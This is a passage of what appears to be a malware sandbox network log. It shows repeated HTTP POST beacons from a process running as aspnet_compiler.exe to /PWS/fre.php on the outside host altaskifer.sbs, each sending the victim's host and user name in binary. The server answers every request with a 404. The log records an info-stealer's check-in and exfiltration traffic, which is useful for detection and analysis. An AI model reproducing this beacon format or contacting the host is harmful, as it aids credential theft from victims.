Apr 6, 2024 09:29:38.161511898 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:29:38.531016111 CEST	605	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:29:38 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9ZEV7kfho2DE7dnxvYx8F6ESdhQ4g3ROHp6CzmI0n%2FIRBx%2FW7NZW76sFvw3AIodXS3zdzWEYNt7XIxZ4QBJFvIbwRNTOVO%2FCMJw2GypTFLRf3va2%2Fo%2FTq05Ib5VU8s7Oew%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8700116528058dfd-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.6	49741	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:29:38.799314976 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:29:38.924406052 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:29:39.313935995 CEST	607	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:29:39 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QbwoXtrwjnbLLJh2mjQBP3L8Q%2FQ9pjSWpMWyDobn%2B6qrh94YlzTJBUvJuDzv%2FBu5n0SlZu6MtQm4jHQlkpMY4WUI7K3%2FFLTJV5lO%2Fko%2BHberpdORawHw4Kml3Xjpz2codg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87001169ee4209ae-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.6	49742	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:29:39.580791950 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:29:39.705121040 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:29:40.073115110 CEST	609	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:29:40 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jDoZIGymzIO5AiUbLpndDKq51%2B%2BU1SHXZHfvIcgKLLtOHE%2BfBNBZLtEbGRHTrrX9Bxs%2B3E8%2FMWTejOaeQIGEUpn2Kl6Vp0ug4o4orN1Z%2FRQTriavg6wbcA8rXNAZvAP%2BXg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8700116ecddc571e-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.6	49743	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:29:40.344957113 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:29:40.469245911 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:29:40.841494083 CEST	597	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:29:40 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=axEIlhmqw5LyDyYO4mpyOKLAP4kkPBuPq0PWlxSgX0Y71PS1LzKT2jSVbWRxkOzDVStzjzYt8XSqka7N0Zz8w18cT6PjX9FfxWeUj9DYIM4%2BQ4lCBC0gLayfrmoHtPdozQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 870011738d7721e7-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.6	49744	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:29:41.115113974 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:29:41.239449978 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:29:41.628089905 CEST	599	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:29:41 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VLEeF4dvhsLMBGj7TPGkdWq0TkKrERdjiBM24LeQbyNWp8aMbcjqbrxgHU%2Fk1qXT76FOOpiBhn%2BMetIEsghpHcoJGwuXFhrLvYjRzTpAvtdVqL1w1SNp9OXSkLfOiyuPJg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 870011785ba28dc7-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.6	49745	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:29:41.891259909 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:29:42.015759945 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:29:42.410334110 CEST	605	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:29:42 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9q%2FDE0bzkgkeri83BEpg28cjFqZIHWRB7yTUaZJhY8J%2F3mnOlupBFuWRZmvf4oG0DWiUaP2f9BPrbdd59Fx4kBAsEZI%2BT66Er%2BeJnojVOFrKNgsPuKlj%2FEauWgcxJerCNA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8700117d3d8e7428-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.6	49746	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:29:42.690473080 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:29:42.815066099 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:29:43.188643932 CEST	601	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:29:43 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CHtzMw8gqyd8ww1EK1BgwMNXzUJTGHFVAIS4yI4QX9upxi0Vv4op3VN1t207upcjUS3yzm5zUWQ00rJ%2BcdKmRpWy6QG1e3lpBoy5%2BnkGGt0VRKU4gJYiwt%2FtVOJC6ALoIQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 870011823de431dd-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.6	49747	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:29:43.454363108 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:29:43.582252026 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:29:43.960227013 CEST	605	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:29:43 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nvX843q7lulzsHsL78ZIETT0odUBFAq%2BajQIO5XuLZNpzUBkQy4gN4dfiNIwb0K8eKo0NhP3hrAFwy0tjE0suoqQtJrDJ9g8ww3Y%2BuNQgbPLTl%2BT%2FONafuml5w%2FQ9IM3vQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87001186fc179ad2-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.6	49748	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:29:44.242162943 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:29:44.366413116 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:29:44.750694990 CEST	601	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:29:44 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ckbKu7yUVBSLi3epH5Ta25Kkmzmm6thGYGLYC6qL1H5gdY7OYA61onKL5dTE1%2B8ERio%2FO19RSmj95WnvMcUZ3TwAO9ql0L0ErwMu0jCZLqH3%2B6ujcNOZNukUlNZczV5L2Q%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8700118beb403364-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.6	49749	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:29:45.018069983 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:29:45.141906023 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:29:45.522923946 CEST	601	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:29:45 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QdA0pcdPBW59ITYBSbOrJwETnAqWQPCO8%2FIn2wKamMM%2BZzbydoO1Cmw4WOHKQ2FvA8tqhuOyrDhez8xDMjI0zCvlGTzIMBR3ONyXzCPwexJj12Wm%2F2qnmXJ7tw2RGK9fCw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87001190cdeb3352-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.6	49750	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:29:45.799676895 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:29:45.923952103 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:29:46.308871984 CEST	605	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:29:46 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZfQRUrB2SdT1eLJyZbio7KvUrEiavKy6urIyN8%2B5G3P7sde62aoet1UR%2BYMfBvosLW0RYLoyF1G78C%2F2InL2kYsYst4Kfxd%2FEI%2FUTIjSRbE4P9zSRqZ4NE9pp34fpTqNDw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87001195aecda512-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.6	49751	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:29:46.581120968 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:29:46.705096006 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:29:47.078301907 CEST	597	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:29:47 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2WoTy8CytH6FCGJ02FnvnJQaOiLpecp8e28%2ByX1uRiZ4CSBTOCeaW6ZaVGSgaHxFmcxS7lBIQM8gyYJwoov7ksoTD86qCD9xFptaRmKV2l7GNItYd6wSvF1VnZUyXdf2Sw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8700119a8a67259a-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.6	49752	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:29:47.378472090 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:29:47.505563021 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:29:47.888562918 CEST	605	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:29:47 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0XodsU6cTpRgul%2BX7ABl17NCZf%2B2hOOH6toQ7msxzgWFuWswfOGEMqSD53AbJakF%2F3rJYxejlf2BPbI8geSPJZX4lnqL05P%2FcNIFJ%2FjADLCVtqXiNeMJggRv6YzGwfRiHQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8700119f8cfe21b5-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.6	49753	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:29:48.178973913 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:29:48.303620100 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:29:49.611900091 CEST	605	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:29:49 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eU6XjyB3%2FNRhFBAew165kUx%2B1dACg6uaxbUHhHekBPp4GbNiULy0hq7LyatbVe3K7%2BD5opbbHmzIhAHb7fOgRDlWs%2FaqjJ7G6hNRVmNvpxZ04odVQ7zWC%2BEiFwBW5gPUgQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 870011a4882c5f20-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.6	49755	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:29:51.123132944 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:29:51.248116970 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:29:51.644701004 CEST	607	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:29:51 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Q63pSfh%2BvejxmCMXLjq0feEjlXe1RY11XvfTfG4xIeMQNPbKAYgakjNORoVfP2RRr2OI6%2FEl4y%2FhgKpIawLCwTRd44XySgK%2BVSCkS1BC8ske%2B%2Bu5I8qFai4yiCazp3UWyg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 870011b6ecd5a56c-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.6	49756	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:29:51.920859098 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
